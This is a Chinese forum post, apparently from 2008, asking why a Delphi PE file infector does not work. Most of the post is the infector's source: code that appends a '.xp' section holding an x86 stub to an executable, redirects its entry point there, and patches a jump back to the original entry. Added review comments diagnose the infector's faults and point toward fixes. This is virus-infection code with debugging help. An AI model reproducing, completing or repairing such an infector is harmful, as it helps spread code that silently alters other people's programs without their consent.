标题:一个添加病毒节感染PE例子出的问题
一个添加病毒节感染PE例子出的问题
前几天参考一个例子，写了一个感染 PE 文件的例子：添加一个病毒节，并把入口地址改到新节。不过经我测试有问题。
希望哪位大牛 对这方面有所了解的 指点一下 小弟 感激不尽



// 36-byte x86 stub that intectPE (below) copies into the new ".xp" section and
// makes the new entry point.  Offsets (decimal) into the array:
//    0: 6A 40            push 40h
//    2: E8 06 00 00 00   call +6   -> pushes the address of offset 7, lands at 13
//    7: 78 34 68 00      "x4h",0
//   11: EB 09            jmp +9    (never reached: the call at offset 2 lands past it)
//   13: E8 04 00 00 00   call +4   -> pushes the address of offset 18, lands at 22
//   18: 78 34 68 00      "x4h",0
//   22: 6A 00            push 0
//   24: B8 8A 05 D5 77   mov eax, 77D5058Ah  ; absolute address baked into the stub
//   29: FF D0            call eax
//   31: E9 00 00 00 00   jmp rel32           ; rel32 patched at MyCode[32..35] by intectPE
// NOTE(review): the four pushes (40h, ptr, ptr, 0) look like a stdcall
// MessageBoxA(0, "x4h", "x4h", 40h) with the API address hard-coded for one
// particular user32.dll build -- confirm.  That absolute address is never
// resolved or relocated, so on any other Windows build, or in a target that has
// not loaded that module at that address by the time its entry point runs, the
// stub faults before it ever jumps back to the original entry point.  This is
// the first thing to check when the infected file "does not work" elsewhere.
// NOTE(review): intectPE assigns MyCode[32..35]; if this is declared as a typed
// constant it needs {$J+} in scope -- the declaring keyword is not visible here.
MyCode:array[0..35] of byte=($6A,$40,$E8,$06,$00,$00,$00,$78,
                               $34,$68,$00,$EB,$09,$E8,$04,$00,
                               $00,$00,$78,$34,$68,$00,$6A,$00,
                               $B8,$8A,$05,$D5,$77,$FF,$D0,$e9,
                               $00,$00,$00,$00);

implementation

{$R *.dfm}

///////////////////////////////////////////////////

function MyAlign(size,AlignNum:integer):integer;
// Rounds size up to the next multiple of AlignNum (used for the PE
// FileAlignment / SectionAlignment fields).  An exact multiple is returned
// unchanged.  A zero size or a zero AlignNum yields 0 -- the latter also
// keeps the mod/div below from dividing by zero.
var
  remainder:integer;
begin
  if (size=0) or (AlignNum=0) then
  begin
    result:=0;
    Exit;
  end;
  remainder:=size mod AlignNum;
  if remainder=0 then
    result:=size
  else
    result:=((size div AlignNum)+1)*AlignNum;
end;
//////////////////////////////////////////////////////
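function ReadData(hfile:THandle;position:dword;var buffer;buffersize:dword):boolean;
// Reads exactly buffersize bytes at absolute file offset position into buffer.
// Returns True only when the seek succeeded, ReadFile reported success and the
// full buffersize bytes arrived.  A short read (file ends before
// position+buffersize, e.g. a truncated header) returns False, and buffer is
// then only partially filled -- callers must check the result before using it.
var
  got:dword;
begin
  result:=false;
  got:=0;
  // Seek relative to the file start.  With lpDistanceToMoveHigh = nil a
  // return of $FFFFFFFF is an unambiguous failure (e.g. invalid handle).
  if setfilepointer(hfile,position,nil,FILE_BEGIN)=DWORD(-1) then Exit;
  // ReadFile's own return value was previously ignored; a failed call left the
  // byte count unreliable.
  if not readfile(hfile,buffer,buffersize,got,nil) then Exit;
  result:=(got=buffersize);
end;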


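function WriteData(hfile:THandle;position:dword;var buffer;buffersize:dword):boolean;
// Writes exactly buffersize bytes from buffer at absolute file offset position.
// Returns True only when the seek succeeded, WriteFile reported success and
// the full buffersize bytes were written; a partial write returns False so the
// caller can tell the file is in an inconsistent state.
var
  written:dword;
begin
  result:=false;
  written:=0;
  // Seek relative to the file start.  With lpDistanceToMoveHigh = nil a
  // return of $FFFFFFFF is an unambiguous failure (e.g. invalid handle).
  if setfilepointer(hfile,position,nil,FILE_BEGIN)=DWORD(-1) then Exit;
  // WriteFile's own return value was previously ignored.
  if not writefile(hfile,buffer,buffersize,written,nil) then Exit;
  result:=(written=buffersize);
end;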


// Appends a new executable section named ".xp" to the PE file Destfile, copies
// MyCode into it and points AddressOfEntryPoint at it; the stub's trailing jmp
// (MyCode[32..35], patched below) returns control to the original entry point.
// The file is modified in place.
//
// NOTE(review): every failure path only calls showmessage and then carries on:
// an invalid handle, an unreadable header or a failed header write all still
// reach the writes below.  No "MZ" / "PE\0\0" signature check and no
// PE32 magic check is made (a PE32+ optional header has a different layout),
// so a non-PE or 64-bit file handed to this routine is simply corrupted.
// The four getmem'd header buffers are never freed, and hfile is not closed
// on the error paths either.  Independently of all that, the stub in MyCode
// calls a hard-coded absolute address, so the result only runs where that
// address is valid -- the most likely reason it "does not work" elsewhere.
procedure intectPE(Destfile:string);
var
  buf:pointer;
  hfile:THandle;
  MyDosHeader:PImageDosHeader;
  MyNtHeaders:PImageNtHeaders;
  MySectionheader,NewSectionheader:PImageSectionHeader;
  MyName:string;
  nFileAlignMent,nSectionAlignMent,nSectionCount:integer;
  dwOldOEP,MyAddress,hFilesize:Dword;
begin
  // Exclusive open (share mode 0) for read+write.
  hFile:=createfile(pchar(DestFile),
                    GENERIC_READ or GENERIC_WRITE,
                    0,
                    nil,
                    OPEN_EXISTING,
                    FILE_ATTRIBUTE_NORMAL,
                    0);
  if hFile=INVALID_HANDLE_VALUE then showmessage('打开错误');  // "open failed" -- execution continues with the invalid handle
// Allocate the header buffers.
//  hfilesize:=getfilesize(hfile,nil);
  getmem(MyDosHeader,sizeof(TImageDosHeader));
  getmem(MyNtHeaders,sizeof(TImageNtHeaders));
  getmem(MySectionheader,sizeof(TImageSectionHeader));
  getmem(NewSectionheader,sizeof(TImageSectionHeader));
  if not readdata(hfile,0,MyDosHeader^,sizeof(TImageDosHeader)) then
  showmessage('读DOS头错误');  // "DOS header read failed"
  // The NT headers sit at e_lfanew; the section table follows them directly.
  if not readdata(hfile,MyDosHeader^._lfanew,MyNtHeaders^,sizeof(TImageNtHeaders)) then
  showmessage('读Nt头错误');  // "NT headers read failed"
  nSectionCount:=MyNtHeaders.FileHeader.NumberOfSections;  // captured before the +1 below; used to place the new header
  dwOldOEP:=MyNtHEADERS^.OptionalHeader.AddressOfEntryPoint;  // RVA the stub must jump back to
  nFileAlignMent:=MyNtHEADERS^.OptionalHeader.FileAlignment;
  nSectionAlignMent:=MyNtHEADERS^.OptionalHeader.SectionAlignment;


  // Read the header of the last section in table order (index NumberOfSections-1);
  // its end is the base for the new section's RVA and raw offset.
  // NOTE(review): this assumes the last header also has the highest RVA and the
  // highest raw offset, which the format does not guarantee.
  if not readdata(hfile,mydosheader^._lfanew+sizeof(TImageNtHeaders)+(MyNtHeaders^.FileHeader.NumberOfSections-1)*sizeof(TImageSectionHeader),MySectionheader^,sizeof(TImageSectionHeader)) then


 showmessage('读最后一个节错误');  // "last section header read failed"
  // Build the new section header.
  MyName:='.xp';
  fillchar(NewSectionHeader^,sizeof(TImageSectionHeader),#0);
  move(MyName[1],NewSectionHeader^.Name[0],length(MyName));
  // RVA: end of the last section's virtual range, rounded up to SectionAlignment.
  NewSectionheader^.VirtualAddress:=MyAlign(MySectionheader.VirtualAddress+MySectionheader.Misc.VirtualSize,nSectionAlignMent);
  // NOTE(review): the literal 30 is smaller than sizeof(MyCode) (36); the two
  // alignment steps normally hide that, but sizeof(MyCode) is the value meant here.
  NewSectionheader^.Misc.VirtualSize:=MyAlign(MyAlign(30,nFileAlignMent),nSectionAlignMent);
  // Raw offset: end of the last section's raw data, rounded up to FileAlignment.
  NewSectionheader^.PointerToRawData:= MyAlign(MySectionheader.PointerToRawData+Mysectionheader.SizeOfRawData,nFileAlignMent);
  NewSectionheader^.SizeOfRawData:=MyAlign(sizeof(MyCode),nFileAlignMent);
  // $E0000020 = IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
  // or IMAGE_SCN_MEM_WRITE (winnt.h).  NOTE(review): nothing in MyCode writes to
  // its own section, so MEM_WRITE ($80000000) is not needed; $60000020 (read +
  // execute) would do and avoids mapping the section writable and executable -- confirm.
  NewSectionheader^.Characteristics:=$E0000020;
  //if (hfilesize-NewSectionheader^.PointerToRawData)<MyAlign(sizeof(MyCode),nFileAlignMent) then
  //begin
 // closehandle(hfile);
  //end;
  // Write the new header into the slot right after the existing section table.
  // NOTE(review): there is no check that this slot still lies inside
  // SizeOfHeaders / before the first section's PointerToRawData; when the
  // header padding is already used up this overwrites the first section's data.
  if not writedata(hfile,mydosheader^._lfanew+sizeof(TImageNtHeaders)+nSectionCount*sizeof(TImageSectionHeader),NewSectionheader^,sizeof(TImageSectionHeader))then
  showmessage('写入新表头错误');  // "new section header write failed"

 // Update the NT headers.
  MyNtHeaders.FileHeader.NumberOfSections:=MyNtHeaders.FileHeader.NumberOfSections+1;
 //myntheaders.OptionalHeader.SizeOfHeaders:=myntheaders.OptionalHeader.SizeOfHeaders+sizeof(Timagesectionheader);
  MyNtHeaders.OptionalHeader.SizeOfCode:=MyAlign(MyNtHeaders.OptionalHeader.SizeOfCode+sizeof(MyCode),nFileAlignMent);
  // NOTE(review): grows SizeOfImage by one aligned block instead of recomputing
  // it as MyAlign(new VirtualAddress + VirtualSize, SectionAlignment); the two
  // agree only if the old SizeOfImage ended exactly at the aligned end of the
  // last section.  A SizeOfImage that is too small is the kind of header
  // inconsistency the loader is likely to reject -- confirm.
  MyNtHeaders.OptionalHeader.SizeOfImage:=MyNtHeaders.OptionalHeader.SizeOfImage+MyAlign(sizeof(MyCode),nSectionAlignMent);
  // Clear the bound-import directory entry -- presumably so the loader does not
  // rely on pre-bound import data for the modified image; verify.
  MyNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress:=0;
  MyNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size:=0;
  MyNtHeaders.OptionalHeader.AddressOfEntryPoint:=NewSectionheader.VirtualAddress;  // execution now starts in .xp
  writedata(hfile,MyDosHeader^._lfanew,MyNtHeaders^,sizeof(TImageNtHeaders));  // NOTE(review): result not checked, unlike the other writes
  // rel32 for the trailing jmp (E9 at MyCode[31]).  The instruction after the
  // jmp is at VirtualAddress + sizeof(MyCode), so the displacement is
  // dwOldOEP - (VirtualAddress + sizeof(MyCode)); the expression below is that
  // value in wrap-around 32-bit arithmetic.

  MyAddress:=0-(NewSectionheader.VirtualAddress-dwOldOEP+sizeof(MyCode));

  //showmessage(inttohex(-myaddress,4));
  // Store the displacement little-endian into MyCode[32..35].
  MyCode[35]:=(MyAddress shr 24)and $FF;
  MyCode[34]:=(MyAddress shr 16)and $FF;
  MyCode[33]:=(MyAddress shr 8)and $FF;
  MyCode[32]:=(MyAddress      )and $FF;
  // Zero-fill the whole raw section first so the padding after the stub is
  // deterministic, then overwrite its first 36 bytes with the stub.
  getmem(buf,NewSectionHeader^.SizeOfRawData);
 // showmessage(inttohex(NewSectionheader^.PointerToRawData,4));
  fillchar(buf^,NewSectionHeader^.SizeOfRawData,#0);
  if not writedata(hfile,NewSectionheader^.PointerToRawData,buf^,NewSectionHeader^.SizeOfRawData) then showmessage('aa');  // zero-fill write failed
  freemem(buf,NewSectionHeader^.SizeOfRawData);

 if not WriteData(hfile,NewSectionheader^.PointerToRawData,MyCode,36) then
 showmessage('写入机器码错误!');  // "stub write failed"
 closehandle(hfile);

end;
2008-02-29 11:10



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-201382-1-1.html



